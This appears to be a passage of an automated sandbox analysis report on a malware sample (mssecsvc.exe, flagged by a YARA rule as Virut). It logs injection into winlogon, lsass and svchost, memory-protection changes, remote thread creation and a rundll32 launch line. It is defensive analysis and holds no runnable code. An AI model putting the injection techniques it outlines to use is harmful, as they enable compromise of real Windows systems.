                Source: C:\Windows\mssecsvc.exeSection loaded: \BaseNamedObjects\itatVt target: unknown protection: execute and read and writeJump to behavior
                Source: C:\Windows\mssecsvc.exeSection loaded: \BaseNamedObjects\itatVt target: unknown protection: execute and read and writeJump to behavior
                Source: C:\Windows\mssecsvc.exeSection loaded: \BaseNamedObjects\itatVt target: unknown protection: execute and read and writeJump to behavior
                Source: C:\Windows\mssecsvc.exeSection loaded: \BaseNamedObjects\itatVt target: unknown protection: execute and read and writeJump to behavior
                Source: C:\Windows\mssecsvc.exeSection loaded: \BaseNamedObjects\itatVt target: unknown protection: execute and read and writeJump to behavior
                Source: C:\Windows\mssecsvc.exeSection loaded: \BaseNamedObjects\itatVt target: unknown protection: execute and read and writeJump to behavior
                Source: C:\Windows\mssecsvc.exeSection loaded: \BaseNamedObjects\itatVt target: unknown protection: execute and read and writeJump to behavior
                Source: C:\Windows\mssecsvc.exeSection loaded: \BaseNamedObjects\itatVt target: unknown protection: execute and read and writeJump to behavior
                Source: C:\Windows\mssecsvc.exeSection loaded: \BaseNamedObjects\itatVt target: unknown protection: execute and read and writeJump to behavior
                Source: C:\Windows\mssecsvc.exeSection loaded: \BaseNamedObjects\itatVt target: unknown protection: execute and read and writeJump to behavior
                Source: C:\Windows\mssecsvc.exeSection loaded: \BaseNamedObjects\itatVt target: unknown protection: execute and read and writeJump to behavior
                Source: C:\Windows\mssecsvc.exeSection loaded: \BaseNamedObjects\itatVt target: unknown protection: execute and read and writeJump to behavior
                Source: C:\Windows\mssecsvc.exeSection loaded: \BaseNamedObjects\itatVt target: unknown protection: execute and read and writeJump to behavior
                Source: C:\Windows\mssecsvc.exeSection loaded: \BaseNamedObjects\itatVt target: unknown protection: execute and read and writeJump to behavior
                Source: C:\Windows\mssecsvc.exeSection loaded: \BaseNamedObjects\itatVt target: unknown protection: execute and read and writeJump to behavior
                Source: C:\Windows\mssecsvc.exeSection loaded: \BaseNamedObjects\itatVt target: unknown protection: execute and read and writeJump to behavior
                Source: C:\Windows\mssecsvc.exeSection loaded: \BaseNamedObjects\itatVt target: unknown protection: execute and read and writeJump to behavior
                Source: C:\Windows\mssecsvc.exeSection loaded: \BaseNamedObjects\itatVt target: unknown protection: execute and read and writeJump to behavior
                Source: C:\Windows\mssecsvc.exeSection loaded: \BaseNamedObjects\itatVt target: unknown protection: execute and read and writeJump to behavior
                Source: C:\Windows\mssecsvc.exeSection loaded: \BaseNamedObjects\itatVt target: unknown protection: execute and read and writeJump to behavior
                Source: C:\Windows\mssecsvc.exeSection loaded: \BaseNamedObjects\itatVt target: unknown protection: execute and read and writeJump to behavior
                Source: C:\Windows\mssecsvc.exeSection loaded: \BaseNamedObjects\itatVt target: unknown protection: execute and read and writeJump to behavior
                Source: C:\Windows\mssecsvc.exeSection loaded: \BaseNamedObjects\itatVt target: unknown protection: execute and read and writeJump to behavior
                Source: C:\Windows\mssecsvc.exeSection loaded: \BaseNamedObjects\itatVt target: unknown protection: execute and read and writeJump to behavior
                Source: C:\Windows\mssecsvc.exeSection loaded: \BaseNamedObjects\itatVt target: unknown protection: execute and read and writeJump to behavior
                Source: C:\Windows\mssecsvc.exeSection loaded: \BaseNamedObjects\itatVt target: unknown protection: execute and read and writeJump to behavior
                Source: C:\Windows\mssecsvc.exeSection loaded: \BaseNamedObjects\itatVt target: unknown protection: execute and read and writeJump to behavior
                Source: C:\Windows\mssecsvc.exeSection loaded: \BaseNamedObjects\itatVt target: unknown protection: execute and read and writeJump to behavior
                Source: C:\Windows\mssecsvc.exeSection loaded: \BaseNamedObjects\itatVt target: unknown protection: execute and read and writeJump to behavior
                Source: C:\Windows\mssecsvc.exeSection loaded: \BaseNamedObjects\itatVt target: unknown protection: execute and read and writeJump to behavior
                Source: C:\Windows\mssecsvc.exeSection loaded: \BaseNamedObjects\itatVt target: unknown protection: execute and read and writeJump to behavior
                Source: C:\Windows\mssecsvc.exeSection loaded: \BaseNamedObjects\itatVt target: unknown protection: execute and read and writeJump to behavior
                Source: C:\Windows\mssecsvc.exeSection loaded: \BaseNamedObjects\itatVt target: unknown protection: execute and read and writeJump to behavior
                Source: C:\Windows\mssecsvc.exeSection loaded: \BaseNamedObjects\itatVt target: unknown protection: execute and read and writeJump to behavior
                Source: C:\Windows\mssecsvc.exeSection loaded: \BaseNamedObjects\itatVt target: unknown protection: execute and read and writeJump to behavior
                Source: C:\Windows\mssecsvc.exeSection loaded: \BaseNamedObjects\itatVt target: unknown protection: execute and read and writeJump to behavior
                Source: C:\Windows\mssecsvc.exeSection loaded: \BaseNamedObjects\itatVt target: unknown protection: execute and read and writeJump to behavior
                Source: C:\Windows\mssecsvc.exeSection loaded: \BaseNamedObjects\itatVt target: unknown protection: execute and read and writeJump to behavior
                Source: C:\Windows\mssecsvc.exeSection loaded: \BaseNamedObjects\itatVt target: unknown protection: execute and read and writeJump to behavior
                Source: C:\Windows\mssecsvc.exeSection loaded: \BaseNamedObjects\itatVt target: unknown protection: execute and read and writeJump to behavior
                Source: C:\Windows\mssecsvc.exeSection loaded: \BaseNamedObjects\itatVt target: unknown protection: execute and read and writeJump to behavior
                Source: C:\Windows\mssecsvc.exeSection loaded: \BaseNamedObjects\itatVt target: unknown protection: execute and read and writeJump to behavior
                Source: C:\Windows\mssecsvc.exeSection loaded: \BaseNamedObjects\itatVt target: unknown protection: execute and read and writeJump to behavior
                Source: C:\Windows\mssecsvc.exeSection loaded: \BaseNamedObjects\itatVt target: unknown protection: execute and read and writeJump to behavior
                Source: C:\Windows\mssecsvc.exeSection loaded: \BaseNamedObjects\itatVt target: unknown protection: execute and read and writeJump to behavior
                Source: C:\Windows\mssecsvc.exeSection loaded: \BaseNamedObjects\itatVt target: unknown protection: execute and read and writeJump to behavior
                Source: C:\Windows\mssecsvc.exeSection loaded: \BaseNamedObjects\itatVt target: unknown protection: execute and read and writeJump to behavior
                Source: C:\Windows\mssecsvc.exeSection loaded: \BaseNamedObjects\itatVt target: unknown protection: execute and read and writeJump to behavior
                Source: C:\Windows\mssecsvc.exeSection loaded: \BaseNamedObjects\itatVt target: unknown protection: execute and read and writeJump to behavior
                Source: C:\Windows\mssecsvc.exeSection loaded: \BaseNamedObjects\itatVt target: unknown protection: execute and read and writeJump to behavior
                Source: C:\Windows\mssecsvc.exeSection loaded: \BaseNamedObjects\itatVt target: unknown protection: execute and read and writeJump to behavior
                Source: C:\Windows\mssecsvc.exeSection loaded: \BaseNamedObjects\itatVt target: unknown protection: execute and read and writeJump to behavior
                Source: C:\Windows\mssecsvc.exeSection loaded: \BaseNamedObjects\itatVt target: unknown protection: execute and read and writeJump to behavior
                Source: C:\Windows\mssecsvc.exeSection loaded: \BaseNamedObjects\itatVt target: unknown protection: execute and read and writeJump to behavior
                Source: C:\Windows\mssecsvc.exeSection loaded: \BaseNamedObjects\itatVt target: unknown protection: execute and read and writeJump to behavior
                Source: C:\Windows\mssecsvc.exeSection loaded: \BaseNamedObjects\itatVt target: unknown protection: execute and read and writeJump to behavior
                Source: C:\Windows\mssecsvc.exeSection loaded: \BaseNamedObjects\lyetVt target: C:\Windows\System32\winlogon.exe protection: execute and read and writeJump to behavior
                Source: C:\Windows\mssecsvc.exeSection loaded: \BaseNamedObjects\lyetVt target: C:\Windows\System32\lsass.exe protection: execute and read and writeJump to behavior
                Source: C:\Windows\mssecsvc.exeSection loaded: \BaseNamedObjects\lyetVt target: C:\Windows\System32\fontdrvhost.exe protection: execute and read and writeJump to behavior
                Source: C:\Windows\mssecsvc.exeSection loaded: \BaseNamedObjects\lyetVt target: C:\Windows\System32\fontdrvhost.exe protection: execute and read and writeJump to behavior
                Source: C:\Windows\mssecsvc.exeSection loaded: \BaseNamedObjects\lyetVt target: C:\Windows\System32\svchost.exe protection: execute and read and writeJump to behavior
                Source: C:\Windows\mssecsvc.exeSection loaded: \BaseNamedObjects\lyetVt target: C:\Windows\System32\svchost.exe protection: execute and read and writeJump to behavior
                Source: C:\Windows\mssecsvc.exeSection loaded: \BaseNamedObjects\lyetVt target: C:\Windows\System32\svchost.exe protection: execute and read and writeJump to behavior
                Source: C:\Windows\mssecsvc.exeSection loaded: \BaseNamedObjects\lyetVt target: C:\Windows\System32\svchost.exe protection: execute and read and writeJump to behavior
                Source: C:\Windows\mssecsvc.exeSection loaded: \BaseNamedObjects\lyetVt target: C:\Windows\System32\dwm.exe protection: execute and read and writeJump to behavior
                Changes memory attributes in foreign processes to executable or writable
                Source: C:\Windows\mssecsvc.exeMemory protected: unknown base: 77509A50 protect: page execute and read and writeJump to behavior
                Source: C:\Windows\mssecsvc.exeMemory protected: unknown base: 77509830 protect: page execute and read and writeJump to behavior
                Source: C:\Windows\mssecsvc.exeMemory protected: unknown base: 7750A040 protect: page execute and read and writeJump to behavior
                Source: C:\Windows\mssecsvc.exeMemory protected: unknown base: 775099D0 protect: page execute and read and writeJump to behavior
                Source: C:\Windows\mssecsvc.exeMemory protected: unknown base: 7750A120 protect: page execute and read and writeJump to behavior
                Source: C:\Windows\mssecsvc.exeMemory protected: unknown base: 77509670 protect: page execute and read and writeJump to behavior
                Source: C:\Windows\mssecsvc.exeMemory protected: unknown base: 77509A50 protect: page execute and read and writeJump to behavior
                Source: C:\Windows\mssecsvc.exeMemory protected: unknown base: 77509830 protect: page execute and read and writeJump to behavior
                Source: C:\Windows\mssecsvc.exeMemory protected: unknown base: 7750A040 protect: page execute and read and writeJump to behavior
                Source: C:\Windows\mssecsvc.exeMemory protected: unknown base: 775099D0 protect: page execute and read and writeJump to behavior
                Source: C:\Windows\mssecsvc.exeMemory protected: unknown base: 7750A120 protect: page execute and read and writeJump to behavior
                Source: C:\Windows\mssecsvc.exeMemory protected: unknown base: 77509670 protect: page execute and read and writeJump to behavior
                Source: C:\Windows\mssecsvc.exeMemory protected: unknown base: 77509A50 protect: page execute and read and writeJump to behavior
                Source: C:\Windows\mssecsvc.exeMemory protected: unknown base: 77509830 protect: page execute and read and writeJump to behavior
                Source: C:\Windows\mssecsvc.exeMemory protected: unknown base: 7750A040 protect: page execute and read and writeJump to behavior
                Source: C:\Windows\mssecsvc.exeMemory protected: unknown base: 775099D0 protect: page execute and read and writeJump to behavior
                Source: C:\Windows\mssecsvc.exeMemory protected: unknown base: 7750A120 protect: page execute and read and writeJump to behavior
                Source: C:\Windows\mssecsvc.exeMemory protected: unknown base: 77509670 protect: page execute and read and writeJump to behavior
                Source: C:\Windows\mssecsvc.exeMemory protected: unknown base: 77509A50 protect: page execute and read and writeJump to behavior
                Source: C:\Windows\mssecsvc.exeMemory protected: unknown base: 77509830 protect: page execute and read and writeJump to behavior
                Source: C:\Windows\mssecsvc.exeMemory protected: unknown base: 7750A040 protect: page execute and read and writeJump to behavior
                Source: C:\Windows\mssecsvc.exeMemory protected: unknown base: 775099D0 protect: page execute and read and writeJump to behavior
                Source: C:\Windows\mssecsvc.exeMemory protected: unknown base: 7750A120 protect: page execute and read and writeJump to behavior
                Source: C:\Windows\mssecsvc.exeMemory protected: unknown base: 77509670 protect: page execute and read and writeJump to behavior
                Source: C:\Windows\mssecsvc.exeMemory protected: unknown base: 77509A50 protect: page execute and read and writeJump to behavior
                Source: C:\Windows\mssecsvc.exeMemory protected: unknown base: 77509830 protect: page execute and read and writeJump to behavior
                Source: C:\Windows\mssecsvc.exeMemory protected: unknown base: 7750A040 protect: page execute and read and writeJump to behavior
                Source: C:\Windows\mssecsvc.exeMemory protected: unknown base: 775099D0 protect: page execute and read and writeJump to behavior
                Source: C:\Windows\mssecsvc.exeMemory protected: unknown base: 7750A120 protect: page execute and read and writeJump to behavior
                Source: C:\Windows\mssecsvc.exeMemory protected: unknown base: 77509670 protect: page execute and read and writeJump to behavior
                Source: C:\Windows\mssecsvc.exeMemory protected: unknown base: 77509A50 protect: page execute and read and writeJump to behavior
                Source: C:\Windows\mssecsvc.exeMemory protected: unknown base: 77509830 protect: page execute and read and writeJump to behavior
                Source: C:\Windows\mssecsvc.exeMemory protected: unknown base: 7750A040 protect: page execute and read and writeJump to behavior
                Source: C:\Windows\mssecsvc.exeMemory protected: unknown base: 775099D0 protect: page execute and read and writeJump to behavior
                Source: C:\Windows\mssecsvc.exeMemory protected: unknown base: 7750A120 protect: page execute and read and writeJump to behavior
                Source: C:\Windows\mssecsvc.exeMemory protected: unknown base: 77509670 protect: page execute and read and writeJump to behavior
                Source: C:\Windows\mssecsvc.exeMemory protected: unknown base: 77509A50 protect: page execute and read and writeJump to behavior
                Source: C:\Windows\mssecsvc.exeMemory protected: unknown base: 77509830 protect: page execute and read and writeJump to behavior
                Source: C:\Windows\mssecsvc.exeMemory protected: unknown base: 7750A040 protect: page execute and read and writeJump to behavior
                Source: C:\Windows\mssecsvc.exeMemory protected: unknown base: 775099D0 protect: page execute and read and writeJump to behavior
                Source: C:\Windows\mssecsvc.exeMemory protected: unknown base: 7750A120 protect: page execute and read and writeJump to behavior
                Source: C:\Windows\mssecsvc.exeMemory protected: unknown base: 77509670 protect: page execute and read and writeJump to behavior
                Source: C:\Windows\mssecsvc.exeMemory protected: unknown base: 77509A50 protect: page execute and read and writeJump to behavior
                Source: C:\Windows\mssecsvc.exeMemory protected: unknown base: 77509830 protect: page execute and read and writeJump to behavior
                Source: C:\Windows\mssecsvc.exeMemory protected: unknown base: 7750A040 protect: page execute and read and writeJump to behavior
                Source: C:\Windows\mssecsvc.exeMemory protected: unknown base: 775099D0 protect: page execute and read and writeJump to behavior
                Source: C:\Windows\mssecsvc.exeMemory protected: unknown base: 7750A120 protect: page execute and read and writeJump to behavior
                Source: C:\Windows\mssecsvc.exeMemory protected: unknown base: 77509670 protect: page execute and read and writeJump to behavior
                Source: C:\Windows\mssecsvc.exeMemory protected: unknown base: 77509A50 protect: page execute and read and writeJump to behavior
                Source: C:\Windows\mssecsvc.exeMemory protected: unknown base: 77509830 protect: page execute and read and writeJump to behavior
                Source: C:\Windows\mssecsvc.exeMemory protected: unknown base: 7750A040 protect: page execute and read and writeJump to behavior
                Source: C:\Windows\mssecsvc.exeMemory protected: unknown base: 775099D0 protect: page execute and read and writeJump to behavior
                Source: C:\Windows\mssecsvc.exeMemory protected: unknown base: 7750A120 protect: page execute and read and writeJump to behavior
                Source: C:\Windows\mssecsvc.exeMemory protected: unknown base: 77509670 protect: page execute and read and writeJump to behavior
                Source: C:\Windows\mssecsvc.exeMemory protected: unknown base: 77509A50 protect: page execute and read and writeJump to behavior
                Source: C:\Windows\mssecsvc.exeMemory protected: unknown base: 77509830 protect: page execute and read and writeJump to behavior
                Source: C:\Windows\mssecsvc.exeMemory protected: unknown base: 7750A040 protect: page execute and read and writeJump to behavior
                Source: C:\Windows\mssecsvc.exeMemory protected: unknown base: 775099D0 protect: page execute and read and writeJump to behavior
                Source: C:\Windows\mssecsvc.exeMemory protected: unknown base: 7750A120 protect: page execute and read and writeJump to behavior
                Source: C:\Windows\mssecsvc.exeMemory protected: unknown base: 77509670 protect: page execute and read and writeJump to behavior
                Source: C:\Windows\mssecsvc.exeMemory protected: unknown base: 77509A50 protect: page execute and read and writeJump to behavior
                Source: C:\Windows\mssecsvc.exeMemory protected: unknown base: 77509830 protect: page execute and read and writeJump to behavior
                Source: C:\Windows\mssecsvc.exeMemory protected: unknown base: 7750A040 protect: page execute and read and writeJump to behavior
                Source: C:\Windows\mssecsvc.exeMemory protected: unknown base: 775099D0 protect: page execute and read and writeJump to behavior
                Source: C:\Windows\mssecsvc.exeMemory protected: unknown base: 7750A120 protect: page execute and read and writeJump to behavior
                Source: C:\Windows\mssecsvc.exeMemory protected: unknown base: 77509670 protect: page execute and read and writeJump to behavior
                Source: C:\Windows\mssecsvc.exeMemory protected: unknown base: 77509A50 protect: page execute and read and writeJump to behavior
                Source: C:\Windows\mssecsvc.exeMemory protected: unknown base: 77509830 protect: page execute and read and writeJump to behavior
                Source: C:\Windows\mssecsvc.exeMemory protected: unknown base: 7750A040 protect: page execute and read and writeJump to behavior
                Source: C:\Windows\mssecsvc.exeMemory protected: unknown base: 775099D0 protect: page execute and read and writeJump to behavior
                Source: C:\Windows\mssecsvc.exeMemory protected: unknown base: 7750A120 protect: page execute and read and writeJump to behavior
                Source: C:\Windows\mssecsvc.exeMemory protected: unknown base: 77509670 protect: page execute and read and writeJump to behavior
                Creates a thread in another existing process (thread injection)
                Source: C:\Windows\mssecsvc.exeThread created: unknown EIP: 7FFF3C38Jump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\HFKDS6VcNO.dll",#1Jump to behavior
                Source: winlogon.exe, 00000007.00000000.399164969.00000209004B0000.00000002.00000001.00040000.00000000.sdmp, winlogon.exe, 00000007.00000000.390729398.00000209004B0000.00000002.00000001.00040000.00000000.sdmp, winlogon.exe, 00000007.00000002.921088105.00000209004B0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Program ManagerG
                Source: dwm.exe, 00000012.00000000.458156548.000002456D75B000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Program Manager
                Source: winlogon.exe, 00000007.00000000.399164969.00000209004B0000.00000002.00000001.00040000.00000000.sdmp, winlogon.exe, 00000007.00000000.390729398.00000209004B0000.00000002.00000001.00040000.00000000.sdmp, winlogon.exe, 00000007.00000002.921088105.00000209004B0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
                Source: winlogon.exe, 00000007.00000000.399164969.00000209004B0000.00000002.00000001.00040000.00000000.sdmp, winlogon.exe, 00000007.00000000.390729398.00000209004B0000.00000002.00000001.00040000.00000000.sdmp, winlogon.exe, 00000007.00000002.921088105.00000209004B0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
                Source: winlogon.exe, 00000007.00000000.399164969.00000209004B0000.00000002.00000001.00040000.00000000.sdmp, winlogon.exe, 00000007.00000000.390729398.00000209004B0000.00000002.00000001.00040000.00000000.sdmp, winlogon.exe, 00000007.00000002.921088105.00000209004B0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
                Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
                Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
                Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
                Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
                Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
                Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
                Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
                Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
                Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformationJump to behavior
                Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
                Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
                Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Windows\mssecsvc.exeCode function: 4_2_00B0388E GetSystemTime,Sleep,InternetGetConnectedState,gethostbyname,socket,ioctlsocket,connect,Sleep,closesocket,4_2_00B0388E
                Source: C:\Windows\mssecsvc.exeCode function: 4_2_00B0042D GetModuleHandleA,GetVersion,VirtualAlloc,FindCloseChangeNotification,SetProcessAffinityMask,NtCreateFile,NtOpenFile,NtCreateProcess,NtCreateProcessEx,NtCreateUserProcess,NtQueryInformationProcess,lstrcpyW,lstrcpyW,lstrcatW,NtMapViewOfSection,NtOpenProcessToken,CreateToolhelp32Snapshot,Process32First,Process32Next,OpenProcess,CreateRemoteThread,FindCloseChangeNotification,4_2_00B0042D
                Source: mssecsvc.exe, mssecsvc.exe, 00000009.00000002.486575854.0000000000710000.00000080.00000001.01000000.00000004.sdmp, mssecsvc.exe, 00000009.00000000.396301371.0000000000710000.00000080.00000001.01000000.00000004.sdmp, tasksche.exe, 00000013.00000002.468514366.0000000000410000.00000002.00000001.01000000.00000005.sdmpBinary or memory string: 2\Device\HarddiskVolume2\Windows\ehome\mcupdate.exe
                Source: mssecsvc.exeBinary or memory string: 8\Device\HarddiskVolume2\Program Files\AVG\Av\avgcmgr.exe

                Stealing of Sensitive Information

                barindex
                Yara detected Virut
                Source: Yara matchFile source: 9.2.mssecsvc.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 4.2.mssecsvc.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0000000E.00000002.902198033.000000007FFD0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000020.00000000.572101569.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000E.00000000.415723694.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000016.00000002.902191414.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000020.00000002.902360653.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000D.00000000.408695665.000000007FFD0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000011.00000000.422292285.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000A.00000002.902190830.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000009.00000002.487557526.0000000000A80000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.902197478.000000007FFD0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000012.00000000.424968557.000000007FFD0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000001B.00000002.902222817.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000023.00000000.581481544.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000A.00000002.902164600.000000007FFD0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000000.398152684.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000011.00000002.902195963.000000007FFD0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000D.00000000.407147003.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000C.00000000.407748268.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000E.00000000.415704475.000000007FFD0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000D.00000002.902577911.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000026.00000002.902444306.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000017.00000002.902194677.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000011.00000000.422258384.000000007FFD0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000012.00000000.424980643.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000001C.00000002.902193202.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000026.00000000.592851352.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000001A.00000002.902192985.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000009.00000002.487502234.0000000000A6B000.00000040.00000001.01000000.00000004.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000B.00000000.405766491.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000021.00000002.902365047.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000022.00000000.577790526.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000021.00000000.575671451.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000028.00000000.599806801.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.902600386.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000A.00000000.404780139.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000C.00000002.902187383.000000007FFD0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000029.00000002.902364285.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000029.00000000.610017301.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000022.00000002.902363987.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000012.00000000.425355415.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000000.392885761.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000A.00000000.399314141.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000B.00000000.405750585.000000007FFD0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000E.00000000.416257871.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000014.00000002.902195308.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000002.902167065.000000007FFD0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000024.00000002.902362977.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000000.398121607.000000007FFD0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000C.00000002.902489489.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.708384122.0000000000B00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000000.389559026.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000027.00000000.595649330.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000025.00000000.588589475.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000011.00000000.422807100.000000007FFD0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000019.00000002.902194107.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000001A.00000000.532376607.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000028.00000002.902434304.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000002.902569116.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000D.00000002.902196541.000000007FFD0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000012.00000000.425337469.000000007FFD0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000000.400454619.000000007FFD0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000011.00000000.422852544.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000001B.00000000.536806617.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000D.00000000.408708378.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000027.00000002.902362984.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000001C.00000000.540275578.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.709969347.000000007FEA0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
